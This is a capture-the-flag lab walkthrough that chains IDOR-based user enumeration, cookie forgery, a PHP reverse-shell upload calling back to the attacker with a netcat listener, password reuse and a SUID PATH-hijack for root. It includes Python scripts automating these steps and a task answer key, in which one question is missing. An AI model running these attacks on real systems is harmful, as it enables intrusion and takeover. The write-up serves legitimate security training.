Whenever you are performing a web assessment that includes authentication mechanisms, it is always advisable to check cookies and sessions and to work out how access control really works.
Introduction
In many cases, remote code execution and a foothold on the system are not achievable through a single flaw, but only after chaining different types of vulnerabilities and exploits.
In this session we are going to look at Information Disclosure and Broken Access Control vulnerabilities. They may seem minor on their own, but they can have a great impact when attacking a system, which is why even small vulnerabilities matter.
Pre-requisite
Before you start to enumerate the target you must install the below tools:
- Mozilla Firefox
- Burp Suite
Enumeration
Find the target IP by clicking on "Spawn Machine".
We start our enumeration by searching for open ports with Nmap:
Ports 22 (SSH) and 80 (HTTP) are open. Visiting the IP in a web browser shows an automotive website.
On the homepage we find interesting information about how the services can be accessed through a login:
According to this information, the website should have a login page. Before we proceed with directory and page enumeration, we can map the website by letting the Burp Suite proxy passively build a site map from the traffic we browse.
Intercept the Web Data using Burpsuite
First, start Burp Suite and configure the browser to send traffic through the proxy. Navigate to the Proxy tab and, under the Intercept sub-tab, click the button so that Intercept is on.
Now click on the FoxyProxy extension and enable the Burp Suite proxy.
With everything set up, refresh the page in the browser, switch to Burp Suite and forward the HTTP request.
Switch to the Target tab and then to the Site map. Some directories and files that were not visible while browsing can be spotted; one that is indeed very interesting is the /cdn-cgi/login directory.
We can visit it in our browser and indeed we are presented with the login page:
We have no valid credentials, but there is also an option to log in as a Guest.
Trying that, we are presented with a couple of new navigation options as a logged-in guest.
After navigating through the available pages, we spot that the only interesting one seems to be the Uploads. However, it is not possible to access it as we need to have super admin rights.
Now, we need to find a way to escalate our privileges from user Guest to super admin role. One way to try this is by checking if cookies and sessions can be manipulated.
Identifying Users via Intruder Attack with Burp Suite
Let's examine the portal further in Burp. We refresh the Accounts page, which displays the user ID for our current user, and intercept the request. We notice what seems to be a custom cookie implementation, comprising a user value and a role. We also notice the id parameter, which for our current guest user is 2.
It might be possible to brute-force the ID values and display the user value for another user, such as the super admin account, using Burp's Intruder module. Press Ctrl+I to send the request to Intruder.
Click on Positions and press Clear to remove the pre-populated payload positions:
Select the ID value (2) and click Add. Next, click on the Payloads tab:
We can generate a sequential list from 1 to 100 with a simple bash loop or with seq 1 100 (Intruder's Numbers payload type, sequential from 1 to 100 with step 1, produces the same list without any pasting). Paste the output into the payload box:
Next, click on the Options tab, ensure that Follow Redirections is set to " Always ", and select the option to " Process cookies in redirections ".
Now, click on the Target tab, and then click Start Attack.
Sort responses by Length and view the results. A few of the responses have a different length, and we proceed to examine them. The super admin account is visible, and the corresponding user value is identified.
Brute-forcing reveals two privileged accounts: id 1 is admin and id 30 is super admin. The box seems inconsistent here, since uploading only works with the admin account with id 1.
Let's try to access the Uploads page again, substituting our user value with the admin:
Cookies can be viewed and changed in Mozilla Firefox through the Developer Tools, a set of web developer tools built into Firefox for examining, editing and debugging HTML, CSS and JavaScript.
To open the Developer Tools panel, right-click on the page content and select Inspect Element (Q).
Then navigate to the Storage section, where cookies are shown. This is an information disclosure vulnerability we can abuse: we now know the access ID of the admin user, so we change our cookie through the Developer Tools so that the user value is 34322 and the role value is admin.
Then we can revisit the Uploads page.
We finally got access to the upload form.
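The Intruder run over the id parameter and the cookie edit just described, as one added Python example (it is not code from the write-up). The request paths, the accounts-table markup, the cookie names and every access ID other than 34322/admin are assumptions, and fake_fetch is a constructed stand-in for the portal so the script runs offline; swap in http_fetch to run it against the spawned machine.

```python
import re
import urllib.request
from collections import defaultdict

# Assumed paths (adjust to what Burp's site map shows for your target):
ACCOUNTS = "/cdn-cgi/login/admin.php?content=accounts&id={id}"
UPLOADS = "/cdn-cgi/login/admin.php?content=uploads"


def http_fetch(url, cookie):
    """GET url with the given Cookie header and return the body as text.
    urllib follows redirects by default, like Intruder's 'Follow redirections: always'."""
    req = urllib.request.Request(url, headers={"Cookie": cookie})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def enumerate_ids(base, cookie, ids, fetch=http_fetch):
    """One request per candidate id (Intruder 'sniper' over the id position).
    Returns {id: response body}; fetch is injectable so this runs offline below."""
    return {i: fetch(base + ACCOUNTS.format(id=i), cookie) for i in ids}


def outliers_by_length(bodies):
    """Ids whose response length differs from the most common length, i.e. the
    rows you would look at first after sorting Intruder results by Length."""
    by_len = defaultdict(list)
    for i, body in bodies.items():
        by_len[len(body)].append(i)
    baseline = max(by_len, key=lambda n: len(by_len[n]))
    return {i: n for n, ids in by_len.items() if n != baseline for i in ids}


# Assumed markup: the accounts table renders <td>access id</td><td>name</td><td>role</td>.
ROW = re.compile(r"<td>(\d+)</td>\s*<td>([^<]+)</td>\s*<td>([^<]+)</td>")


def parse_account(body):
    """(access_id, username, role) from the accounts row, or None if the id is unused."""
    m = ROW.search(body)
    return (m.group(1), m.group(2), m.group(3)) if m else None


def forged_cookie(access_id, role):
    """The cookie the write-up edits by hand in Firefox's Storage tab (assumed names)."""
    return "user=%s; role=%s" % (access_id, role)


def can_upload(base, cookie, fetch=http_fetch):
    """True if the uploads page renders the file input instead of the refusal."""
    return 'type="file"' in fetch(base + UPLOADS, cookie)  # assumed marker of the form


# Constructed stand-in for the target so the script runs offline: 34322/admin is the
# value from the write-up, every other access id here is made up.
FAKE_USERS = {1: ("34322", "admin", "admin"), 2: ("2233", "guest", "guest"),
              30: ("86575", "john", "super admin")}


def fake_fetch(url, cookie):
    """Emulates the two flaws: the accounts page discloses any user's access id to
    anyone who asks (the IDOR), and the uploads page trusts the role in the cookie."""
    if "content=accounts" in url:
        m = re.search(r"id=(\d+)", url)
        row = FAKE_USERS.get(int(m.group(1))) if m else None
        if row is None:
            return "<html><body><table></table></body></html>"
        return ("<html><body><table><tr><td>%s</td><td>%s</td><td>%s</td></tr>"
                "</table></body></html>" % row)
    if "content=uploads" in url:
        if "role=admin" in cookie.replace(" ", "").split(";"):
            return '<html><body><form><input type="file" name="fileToUpload"></form></body></html>'
        return "<html><body>Requires super admin rights.</body></html>"
    return "<html><body>not found</body></html>"


if __name__ == "__main__":
    base = "http://TARGET_IP"  # replace with the spawned machine's IP when using http_fetch
    guest = forged_cookie("2233", "guest")  # constructed guest cookie
    found = enumerate_ids(base, guest, range(1, 101), fetch=fake_fetch)
    for i in sorted(outliers_by_length(found)):
        print("id=%d -> %s" % (i, parse_account(found[i])))
    admin_id, _, admin_role = parse_account(found[1])
    print("upload form as admin:", can_upload(base, forged_cookie(admin_id, admin_role), fetch=fake_fetch))
    print("upload form as guest:", can_upload(base, guest, fetch=fake_fetch))
```

Sorting by length is a heuristic: two users whose rows happen to have the same length as the baseline would be missed, so follow it up with parse_account over every response when the id space is small.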
Foothold
Now that we have access to the upload form we can attempt to upload a PHP reverse shell.
Establish Server Access Using PHP Reverse Shell
Instead of writing our own, we will use an existing one: the widely used php-reverse-shell.php (pentestmonkey), available on GitHub.
Copy the code and paste it into Notepad or Notepad++.
Now modify it to suit our needs: change the listening host ($ip = {openVPN IP}) and the listening port ($port = 4444) to match our settings, then attempt to upload the file.
The upload succeeds. We now need to locate the folder where uploaded files are stored, either by brute-forcing directories or by guessing.
An /uploads directory is the logical assumption, and we confirm it by running gobuster as well.
gobuster immediately finds the /uploads directory. Listing the directory is not permitted, but we can still request our uploaded file by name. Before doing so, start a netcat listener on the port set in the shell (for example nc -lvnp 4444).
Then request our shell through the browser (http://{target IP}/uploads/php-reverse-shell.php).
Go back to the Netcat listener and find out if the connection is established or not.
Note: In case our shell is not there it might have been deleted so we need to upload it again.
We got a reverse shell! To get a fully interactive shell, upgrade to a TTY, for example with python3 -c 'import pty; pty.spawn("/bin/bash")'.
As www-data we cannot achieve much, since that account has restricted access to the system.
We can list the accounts on the system by reading /etc/passwd; a user named robert stands out.
Since the website uses PHP and SQL, we enumerate the web directory further for disclosures or misconfigurations. Under /var/www/html/cdn-cgi/login we find some interesting PHP files, among them the database configuration file db.php. Credentials in such files are always worth trying against local users, and indeed the database password is reused by robert.
With that password we can log in as robert (su from the shell, or SSH on port 22), and the user flag can be read from /home/robert.
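The upload procedure above (edit the shell's callback address, submit it through the form, locate it under /uploads, trigger it with the listener running), as an added Python example rather than the write-up's own code. The form field name, the upload URL and the template snippet are assumptions or constructed stand-ins; the two variable lines mirror the real php-reverse-shell.php, and /uploads is the directory the write-up's gobuster run confirmed.

```python
import re
import socket
import urllib.error
import urllib.request
import uuid

# Assumed names: the page only says the form posts to the uploads page and
# that files land in /uploads.
UPLOAD_PATH = "/cdn-cgi/login/admin.php?content=uploads"
UPLOAD_FIELD = "fileToUpload"

# Constructed stand-in for the top of php-reverse-shell.php; the real file
# has the same two variable lines with '// CHANGE THIS' comments.
TEMPLATE_SNIPPET = """<?php
set_time_limit (0);
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
"""


def patch_reverse_shell(src, ip, port):
    """Rewrite the $ip and $port lines the write-up edits in Notepad. Fails loudly
    if either line is missing, rather than uploading a shell that calls 127.0.0.1."""
    out, n_ip = re.subn(r"^\$ip\s*=\s*'[^']*';", "$ip = '%s';" % ip, src, count=1, flags=re.M)
    out, n_port = re.subn(r"^\$port\s*=\s*\d+;", "$port = %d;" % int(port), out, count=1, flags=re.M)
    if n_ip != 1 or n_port != 1:
        raise ValueError("template does not contain the expected $ip/$port lines")
    return out


def multipart_body(field, filename, data, boundary=None):
    """Encode one file the way the browser's form does.
    Returns (Content-Type header value, body bytes)."""
    boundary = boundary or uuid.uuid4().hex
    head = ("--%s\r\n" % boundary
            + 'Content-Disposition: form-data; name="%s"; filename="%s"\r\n' % (field, filename)
            + "Content-Type: application/octet-stream\r\n\r\n").encode()
    return ("multipart/form-data; boundary=%s" % boundary,
            head + data + ("\r\n--%s--\r\n" % boundary).encode())


def http_post(url, cookie, content_type, body):
    """POST the body with the forged admin cookie; returns the HTTP status code."""
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers={"Cookie": cookie, "Content-Type": content_type})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


def upload_shell(base, cookie, php_source, filename="php-reverse-shell.php", post=http_post):
    """Upload the patched shell through the form. post is injectable for offline use."""
    ctype, body = multipart_body(UPLOAD_FIELD, filename, php_source.encode())
    return post(base + UPLOAD_PATH, cookie, ctype, body) == 200


def shell_url(base, filename="php-reverse-shell.php"):
    """Where the file is served from: the /uploads directory gobuster confirmed."""
    return base + "/uploads/" + filename


def trigger_shell(url, timeout=5):
    """Request the shell once the listener is up. A live shell never answers (PHP
    blocks on the socket), so a read timeout means it fired; a 404 means the file
    was cleaned up and must be uploaded again (the write-up's note)."""
    try:
        urllib.request.urlopen(url, timeout=timeout).read()
    except urllib.error.HTTPError as e:
        return "missing" if e.code == 404 else "http %d" % e.code
    except urllib.error.URLError as e:
        return "triggered" if isinstance(e.reason, socket.timeout) else "unreachable: %s" % e.reason
    except socket.timeout:
        return "triggered"
    return "returned"  # the page came back: not a working shell


if __name__ == "__main__":
    patched = patch_reverse_shell(TEMPLATE_SNIPPET, "10.10.14.2", 4444)  # use your VPN IP
    print(patched)
    ctype, body = multipart_body(UPLOAD_FIELD, "php-reverse-shell.php", patched.encode(), boundary="demo")
    print(ctype)
    print(body.decode())
    print(shell_url("http://TARGET_IP"))
```

Against the real target, run nc -lvnp 4444 first, call upload_shell with the forged admin cookie, then trigger_shell(shell_url(base)); if it reports "missing", the cleanup job got there first and you simply upload again.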
Privilege Escalation
Before running any privilege escalation or enumeration script, let's check the basic commands for elevating privileges like sudo and id.
We observe that user robert is a member of the bugtracker group.
Exploiting Privilege Escalation Vulnerability in Bugtracker
Let's check whether any file belongs to that group (find / -group bugtracker 2>/dev/null, as in Task 7). We find a binary named bugtracker and check its permissions and file type with ls -l and file.
The SUID bit is set on the binary, which is a promising exploitation path: whoever runs it, it executes with the file owner's privileges. We run bugtracker and provide bug ID 2.
As you can see, we obtain root permissions. The root flag can be found in /root. Note from Task 10 that the binary calls cat in an insecure manner: a SUID program that invokes a helper by bare name rather than by absolute path resolves it through the caller's PATH, which is the classic way such a binary is turned into a root shell.
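The enumeration steps above (find the files owned by the group, read their owner, mode and SUID bit, and look inside the binary for a command invoked by bare name), as an added Python example that is not part of the write-up. SAMPLE_BINARY is constructed bytes standing in for a strings pass over a vulnerable binary, and the command list is an assumption; run it against /usr/bin/bugtracker on the target to check the real thing.

```python
import grp
import os
import pwd
import stat


def _name(lookup, ident):
    """Resolve a uid/gid to a name, falling back to the number when there is no entry."""
    try:
        return lookup(ident)[0]
    except KeyError:
        return str(ident)


def files_owned_by_group(root, group):
    """Python equivalent of `find ROOT -group GROUP 2>/dev/null`: walk the tree,
    skip anything we cannot stat, and return paths whose gid matches.
    group may be a name or a numeric gid."""
    gid = group if isinstance(group, int) else grp.getgrnam(group).gr_gid
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if st.st_gid == gid:
                hits.append(path)
    return hits


def describe(path):
    """The part of `ls -l` that matters here: owner, group, mode and whether the
    SUID bit is set (the file runs with the owner's uid for anyone allowed to execute it)."""
    st = os.lstat(path)
    return {
        "owner": _name(pwd.getpwuid, st.st_uid),
        "group": _name(grp.getgrgid, st.st_gid),
        "mode": stat.filemode(st.st_mode),
        "suid": bool(st.st_mode & stat.S_ISUID),
        "regular": stat.S_ISREG(st.st_mode),
    }


def printable_strings(data, min_len=4):
    """Rough `strings`: runs of printable ASCII at least min_len long."""
    out, run = [], bytearray()
    for b in data:
        if 32 <= b < 127:
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(run.decode())
            run = bytearray()
    if len(run) >= min_len:
        out.append(run.decode())
    return out


def bare_command_references(data, commands=("cat", "sh", "bash", "cp", "ls")):
    """Strings that start with a command name not anchored to an absolute path.
    A SUID binary that runs such a command resolves it through the caller's PATH,
    which is what makes an insecure `cat` call exploitable. The command list is an assumption."""
    return [s for s in printable_strings(data)
            if any(s == c or s.startswith(c + " ") for c in commands)]


# Constructed sample bytes: an ELF-like prefix, some prompt text, one command
# called by bare name and one called by absolute path.
SAMPLE_BINARY = (b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
                 + b"------------------\x00: Bug Tracker : \x00"
                 + b"Provide Bug ID: \x00cat /var/lib/bugtracker/reports/\x00/bin/ls -l\x00")


if __name__ == "__main__":
    group = grp.getgrgid(os.getgid()).gr_name  # use "bugtracker" on the target, with root="/"
    for path in files_owned_by_group(os.path.expanduser("~"), group)[:5]:
        print(path, describe(path))
    print("bare command references:", bare_command_references(SAMPLE_BINARY))
```

A hit from bare_command_references is only a lead: confirm it by watching the binary run (for example under strace) before relying on it, since the same string could be a prompt or a log message rather than a call.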
We got both the flags, congratulations!
Task Answer
TASK 1: With what kind of tool can one intercept web traffic?
Ans. proxy
TASK 2: What is the path to the directory on the web server that returns a login page?
Ans. /cdn-cgi/login
TASK 3: What can be modified in Firefox to get access to the upload page?
Ans. cookie
TASK 4: What is the access ID of the admin user?
Ans. 34322
TASK 5: On uploading a file, what directory does that file appear in on the server?
Ans. /uploads
TASK 6: What is the file that contains the password that is shared with the robert user?
Ans. db.php
TASK 7: What executable is run with the option "-group bugtracker" to identify all files owned by the bugtracker group?
Ans. find
Ans. root
TASK 9: What does SUID stand for?
Ans. Set owner User ID
TASK 10: What is the name of the executable being called in an insecure manner?
Ans. cat